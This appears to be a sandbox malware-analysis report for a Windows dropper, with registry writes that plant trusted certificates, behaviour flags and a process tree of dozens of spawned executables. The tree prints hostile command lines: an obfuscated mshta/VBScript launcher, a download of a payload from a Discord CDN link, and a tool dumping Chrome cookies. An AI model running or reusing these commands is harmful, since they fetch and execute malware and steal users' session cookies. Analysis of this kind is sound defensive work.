| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| Set value (data) | \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\SystemCertificates\CA\Certificates\8D4C4A23BA9EE84EA7348FA98CC6E65FBB69DE7B\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\is-V4ULV.tmp\Setup.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 04000000010000001000000087ce0b7b2a0e4900e158719b37a893720300000001000000140000000563b8630d62d75abbc8ab1e4bdfb5a899b24d431d00000001000000100000004f5f106930398d09107b40c3c7ca8f1c0b000000010000001200000044006900670069004300650072007400000014000000010000001400000045eba2aff492cb82312d518ba7a7219df36dc80f6200000001000000200000003e9099b5015e8f486c00bcea9d111ee721faba355a89bcf1df69561e3dc6325c090000000100000034000000303206082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030106082b06010505070308530000000100000040000000303e301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f00000001000000140000006dca5bd00dcf1c0f327059d374b29ca6e3c50aa62000000001000000bb030000308203b73082029fa00302010202100ce7e0e517d846fe8fe560fc1bf03039300d06092a864886f70d01010505003065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3065310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312430220603550403131b4469676943657274204173737572656420494420526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100ad0e15cee443805cb187f3b760f97112a5aedc269488aaf4cef520392858600cf880daa9159532613cb5b128848a8adc9f0a0c83177a8f90ac8ae779535c31842af60f98323676ccdedd3ca8a2ef6afb21f25261df9f20d71fe2b1d9fe1864d2125b5ff9581835bc47cda136f96b7fd4b0383ec11bc38c33d9d82f18fe280fb3a783d6c36e44c061359616fe599c8b766dd7f1a24b0d2bff0b72da9e60d08e9035c678558720a1cfe56d0ac8497c3198336c22e987d0325aa2ba138211ed39179d993a72a1e6faa4d9d5173175ae857d22ae3f014686f62879c8b1dae45717c47e1c0eb0b492a656b3bdb297edaaa7f0b7c5a83f9516d0ffa196eb085f18774f0203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041445eba2aff492cb82312d518ba7a7219df36dc80f301f0603551d2304183016801445eba2aff492cb82312d518ba7a7219df36dc80f300d06092a864886f70d01010505000382010100a20ebcdfe2edf0e372737a6494bff77266d832e4427562ae87ebf2d5d9de56b39fccce1428b90d97605c124c58e4d33d834945589735691aa847ea56c679ab12d8678184df7f093c94e6b8262c20bd3db32889f75fff22e297841fe965ef87e0dfc16749b35debb2092aeb26ed78be7d3f2bf3b726356d5f8901b6495b9f01059bab3d25c1ccb67fc2f16f86c6fa6468eb812d94eb42b7fa8c1edd62f1be5067b76cbdf3f11f6b0c3607167f377ca95b6d7af112466083d72704be4bce97bec3672a6811df80e70c3366bf130d146ef37f1f63101efa8d1b256d6c8fa5b76101b1d2a326a110719dade2c3f9c39951b72b0708ce2ee650b2a7fa0a452fa2f0f2 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 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 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\5E66E0CA2367757E800E65B770629026E131A7DC\Blob = 0300000001000000140000005e66e0ca2367757e800e65b770629026e131a7dc2000000001000000ba060000308206b63082059ea003020102021004d54dc0a2016b263eeeb255d321056e300d06092a864886f70d0101050500306f310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d312e302c060355040313254469676943657274204173737572656420494420436f6465205369676e696e672043412d31301e170d3133303831333030303030305a170d3136303930323132303030305a308181310b3009060355040613025553311330110603550408130a43616c69666f726e6961311330110603550407130a506c656173616e746f6e31233021060355040a131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e312330210603550403131a4f70656e56504e20546563686e6f6c6f676965732c20496e632e30820122300d06092a864886f70d01010105000382010f003082010a0282010100a10462099150b2575bc037614701c292ba96e98270fdb06e1d1f40343e720e259d6f9fdf59bcb9365f8cea69689aed7a4354591db75509826ad71ab3f00cb18ed11157effc5eb3bf5730b33b5ba76fd73f3fd7f1b2256410223a7f8f5f52b6fb8b31a979cc50f831880fc837c81168e74dd4f57368ef55a1dbe480a815128e0d944d4d70be02ed65efe486a020f50dfdfe6d2a0dfab3ff9885fdb1bc39b79bb0a38183e42d557a60da66883c3307c208655da1a43eeb2393ea10b200f55ddfd66da47eae911eebe43113c7aafdf8e13d2fef2604eac2e3739021816b323dc9ef0f8411a1a7921023ff3cd7f1f4d4307f6ad13816d47b93823c9683069315088d0203010001a382033930820335301f0603551d230418301680147b68ce29aac017be497ae1e53fd6a7f7458f3532301d0603551d0e041604149afe50cc7c723e76b49c036a97a88c8135cb6651300e0603551d0f0101ff04040302078030130603551d25040c300a06082b0601050507030330730603551d1f046c306a3033a031a02f862d687474703a2f2f63726c332e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c3033a031a02f862d687474703a2f2f63726c342e64696769636572742e636f6d2f617373757265642d63732d32303131612e63726c308201c40603551d20048201bb308201b7308201b306096086480186fd6c0301308201a4303a06082b06010505070201162e687474703a2f2f7777772e64696769636572742e636f6d2f73736c2d6370732d7265706f7369746f72792e68746d3082016406082b06010505070202308201561e8201520041006e007900200075007300650020006f00660020007400680069007300200043006500720074006900660069006300610074006500200063006f006e0073007400690074007500740065007300200061006300630065007000740061006e006300650020006f00660020007400680065002000440069006700690043006500720074002000430050002f00430050005300200061006e00640020007400680065002000520065006c00790069006e0067002000500061007200740079002000410067007200650065006d0065006e00740020007700680069006300680020006c0069006d006900740020006c0069006100620069006c00690074007900200061006e0064002000610072006500200069006e0063006f00720070006f00720061007400650064002000680065007200650069006e0020006200790020007200650066006500720065006e00630065002e30818206082b0601050507010104763074302406082b060105050730018618687474703a2f2f6f6373702e64696769636572742e636f6d304c06082b060105050730028640687474703a2f2f636163657274732e64696769636572742e636f6d2f4469676943657274417373757265644944436f64655369676e696e6743412d312e637274300c0603551d130101ff04023000300d06092a864886f70d0101050500038201010035d3e402ab7e93e4c84f74475c2403fbaf99335beb29aef76c0cbadf9eed476e26ae26aa5e87bb55e851926d2db986d674efd71abe7ecdc4b57c98d65b862725bd09e466949c3cf68cb40631d734ee948e4a7e5c849edf9757530a17e85c91e3dbc61e31a5d30b7250e83316c23728cc3fc0c721f61780a9f8542b575131652426be91885d9756313eff308755b60ccf6ade5f7bd7e32690a51c0b470a3bfe9dbedad74b535349ff469baa3e4d741d7db011501f80afdc4138a345c36e78710681be9d5b2bd45620bfaddf8e4ebd58e0820296f5c40c06fc48db187ff49fcaf489866fdae7c4d7224e3548bac384a5e7b59175c8fd6a667fa6ee3838802ce9be | C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E | C:\Users\Admin\AppData\Local\Temp\is-V4ULV.tmp\Setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 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 | C:\Users\Admin\AppData\Local\Temp\is-V4ULV.tmp\Setup.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\TrustedPublisher\Certificates\CBC64D0FC770B1694DF723BB18B5679CE09B61CA\Blob = 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 | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\0563B8630D62D75ABBC8AB1E4BDFB5A899B24D43\Blob = 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 | C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\2B8F1B57330DBBA2D07A6C51F70EE90DDAB9AD8E\Blob = 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 | C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\PING.EXE | N/A |
Script User-Agent
| Description | Indicator | Process | Target |
| HTTP User-Agent header | Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) | N/A | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\Setup (9).exe | N/A |
| N/A | N/A | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\5981299.exe | N/A |
| N/A | N/A | N/A | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe | N/A |
Suspicious behavior: SetClipboardViewer
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Roaming\8683368.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeRestorePrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeBackupPrivilege | N/A | C:\Windows\SysWOW64\WerFault.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\3U69TfgyoayjTexid7zPlzoC.exe | N/A |
| Token: SeShutdownPrivilege | N/A | N/A | N/A |
| Token: SeCreatePagefilePrivilege | N/A | N/A | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Roaming\5981299.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\cd-ab295-225-721bf-6247042dd1c93\Cyzhaesezhumy.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\Documents\hDsAWRTRwqAU97Qmy0jnkUpp.exe | N/A |
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\explorer.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\Documents\hDsAWRTRwqAU97Qmy0jnkUpp.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\A71E.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-3JGMC.tmp\builder.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\Setup (9).exe
"C:\Users\Admin\AppData\Local\Temp\Setup (9).exe"
C:\Windows\System32\sihclient.exe
C:\Windows\System32\sihclient.exe /cv juDKImBLWkCHi9D6+osR0w.0.2
C:\Users\Admin\Documents\p_hy_eIl2kbt2ySV1hwTK6x5.exe
"C:\Users\Admin\Documents\p_hy_eIl2kbt2ySV1hwTK6x5.exe"
C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe
"C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe"
C:\Users\Admin\Documents\wITbbD2V3AT4HSORFrtFuP3H.exe
"C:\Users\Admin\Documents\wITbbD2V3AT4HSORFrtFuP3H.exe"
C:\Users\Admin\Documents\u2FK9BPxP4iW7ESUZK457cwp.exe
"C:\Users\Admin\Documents\u2FK9BPxP4iW7ESUZK457cwp.exe"
C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe
"C:\Users\Admin\Documents\P64NJfK8X91BmMbXGQCgnQbs.exe"
C:\Users\Admin\Documents\3U69TfgyoayjTexid7zPlzoC.exe
"C:\Users\Admin\Documents\3U69TfgyoayjTexid7zPlzoC.exe"
C:\Users\Admin\Documents\hDsAWRTRwqAU97Qmy0jnkUpp.exe
"C:\Users\Admin\Documents\hDsAWRTRwqAU97Qmy0jnkUpp.exe"
C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe
"C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe"
C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe
"C:\Users\Admin\Documents\7y5Vp6Y4Dw__GrMpFc7jH5oK.exe"
C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe
"C:\Users\Admin\Documents\tu26dSuvrMVfSvTUy3rQdUyV.exe"
C:\Users\Admin\Documents\BZjDUm4tFr7XJb3S1HdVrMDz.exe
"C:\Users\Admin\Documents\BZjDUm4tFr7XJb3S1HdVrMDz.exe"
C:\Users\Admin\Documents\qwqBiRJKytgxyXwIMY_HvkCk.exe
"C:\Users\Admin\Documents\qwqBiRJKytgxyXwIMY_HvkCk.exe"
C:\Windows\system32\cmd.exe
"C:\Windows\system32\cmd" /c "C:\Users\Admin\AppData\Local\Temp\C411.tmp\C412.tmp\C413.bat C:\Users\Admin\Documents\wITbbD2V3AT4HSORFrtFuP3H.exe"
C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe
"C:\Users\Admin\Documents\malYGI8HZrasOZasQ2c0TEdv.exe"
C:\Users\Admin\AppData\Local\Temp\is-LHKI0.tmp\qwqBiRJKytgxyXwIMY_HvkCk.tmp
"C:\Users\Admin\AppData\Local\Temp\is-LHKI0.tmp\qwqBiRJKytgxyXwIMY_HvkCk.tmp" /SL5="$60202,138429,56832,C:\Users\Admin\Documents\qwqBiRJKytgxyXwIMY_HvkCk.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 3124 -ip 3124
C:\Users\Admin\Documents\Gr1qBF8DD5Dpt4Vzo4DacFcs.exe
"C:\Users\Admin\Documents\Gr1qBF8DD5Dpt4Vzo4DacFcs.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 276
C:\Users\Admin\Documents\BZjDUm4tFr7XJb3S1HdVrMDz.exe
"C:\Users\Admin\Documents\BZjDUm4tFr7XJb3S1HdVrMDz.exe" -q
C:\Users\Admin\AppData\Local\Temp\C411.tmp\C412.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\C411.tmp\C412.tmp\extd.exe "/random" "9000000" "" "" "" "" "" "" ""
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3152 -ip 3152
C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe
"C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe"
C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe
"C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe"
C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe
C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe
C:\Users\Admin\AppData\Local\Temp\C411.tmp\C412.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\C411.tmp\C412.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
C:\Users\Admin\Documents\2OqLhCZhB1J2lBUhFb9Agohl.exe
"C:\Users\Admin\Documents\2OqLhCZhB1J2lBUhFb9Agohl.exe"
C:\Users\Admin\Documents\atrLSYVoi8cef007Wc5_rvmQ.exe
"C:\Users\Admin\Documents\atrLSYVoi8cef007Wc5_rvmQ.exe"
C:\Users\Admin\Documents\1PK75Ee7bUR5cLhxwMHcBK4D.exe
"C:\Users\Admin\Documents\1PK75Ee7bUR5cLhxwMHcBK4D.exe"
C:\Users\Admin\Documents\WUvO9Xb63O1oupFBU1fJHgGX.exe
"C:\Users\Admin\Documents\WUvO9Xb63O1oupFBU1fJHgGX.exe"
C:\Users\Admin\Documents\xdwePyVhF3a2vadLaZK8AsAE.exe
"C:\Users\Admin\Documents\xdwePyVhF3a2vadLaZK8AsAE.exe"
C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe
"C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe"
C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe
"C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe"
C:\Users\Admin\Documents\vD2iyS_Ba05Y__H4Qbjqun4a.exe
"C:\Users\Admin\Documents\vD2iyS_Ba05Y__H4Qbjqun4a.exe"
C:\Users\Admin\Documents\x6Hnh70y97fx0Du2lrfFW9jg.exe
"C:\Users\Admin\Documents\x6Hnh70y97fx0Du2lrfFW9jg.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 276
C:\Users\Admin\AppData\Local\Temp\C411.tmp\C412.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\C411.tmp\C412.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/879335227095416884/879627930865639475/DES6_6_6.exe" "DES6_6_6.exe" "" "" "" "" "" ""
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF """" == """" for %j iN (""C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )
C:\Users\Admin\AppData\Roaming\5981299.exe
"C:\Users\Admin\AppData\Roaming\5981299.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2808 -ip 2808
C:\Users\Admin\AppData\Roaming\1378248.exe
"C:\Users\Admin\AppData\Roaming\1378248.exe"
C:\Users\Admin\AppData\Roaming\5949319.exe
"C:\Users\Admin\AppData\Roaming\5949319.exe"
C:\Program Files (x86)\Company\NewProduct\customer3.exe
"C:\Program Files (x86)\Company\NewProduct\customer3.exe"
C:\Users\Admin\AppData\Roaming\3166452.exe
"C:\Users\Admin\AppData\Roaming\3166452.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "" == "" for %j iN ("C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe" ) do taskkill -im "%~NXj" -f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2456 -ip 2456
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 316
C:\Program Files (x86)\Company\NewProduct\jooyu.exe
"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
C:\Users\Admin\AppData\Local\Temp\18734\DES6_6_6.exe
DES6_6_6.exe
C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe
C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe
C:\Users\Admin\AppData\Local\Temp\is-A08VA.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-A08VA.tmp\Setup.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe
Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo
C:\Users\Admin\AppData\Local\Temp\C411.tmp\C412.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\C411.tmp\C412.tmp\extd.exe "/sleep" "9000009" "" "" "" "" "" "" ""
C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe
C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill -im "mUtXfmRxIl2lXYs36EcxefSC.exe" -f
C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF ""-PMrvgB7ejl2YIjc3PC8aTZbo"" == """" for %j iN (""C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\is-J6JHQ.tmp\Stats.tmp
"C:\Users\Admin\AppData\Local\Temp\is-J6JHQ.tmp\Stats.tmp" /SL5="$202BE,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4932 -ip 4932
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 972 -ip 972
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 5052 -ip 5052
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5052 -s 272
C:\Users\Admin\AppData\Local\Temp\is-GFEPF.tmp\Inlog.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GFEPF.tmp\Inlog.tmp" /SL5="$103B0,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4932 -s 292
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 972 -s 292
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
C:\Users\Admin\AppData\Local\Temp\is-JUG2S.tmp\WEATHER Manager.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JUG2S.tmp\WEATHER Manager.tmp" /SL5="$1040A,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\is-6LCFO.tmp\MediaBurner2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6LCFO.tmp\MediaBurner2.tmp" /SL5="$10464,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "-PMrvgB7ejl2YIjc3PC8aTZbo" == "" for %j iN ("C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe" ) do taskkill -im "%~NXj" -f
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\is-B1G14.tmp\VPN.tmp
"C:\Users\Admin\AppData\Local\Temp\is-B1G14.tmp\VPN.tmp" /SL5="$104BE,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
C:\Users\Admin\AppData\Local\Temp\A71E.exe
C:\Users\Admin\AppData\Local\Temp\A71E.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1152 -ip 1152
C:\Users\Admin\AppData\Local\Temp\is-LBNRK.tmp\ultradumnibour.exe
"C:\Users\Admin\AppData\Local\Temp\is-LBNRK.tmp\ultradumnibour.exe" /S /UID=burnerch2
C:\Users\Admin\AppData\Local\Temp\AD2A.exe
C:\Users\Admin\AppData\Local\Temp\AD2A.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1152 -s 272
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
C:\Users\Admin\AppData\Local\Temp\is-3CD7D.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-3CD7D.tmp\Setup.exe" /silent /subid=720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1796 -ip 1796
C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp" /SL5="$203A8,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-3CD7D.tmp\Setup.exe" /silent /subid=720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1796 -s 292
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 5984 -ip 5984
C:\Users\Admin\AppData\Local\Temp\C007.exe
C:\Users\Admin\AppData\Local\Temp\C007.exe
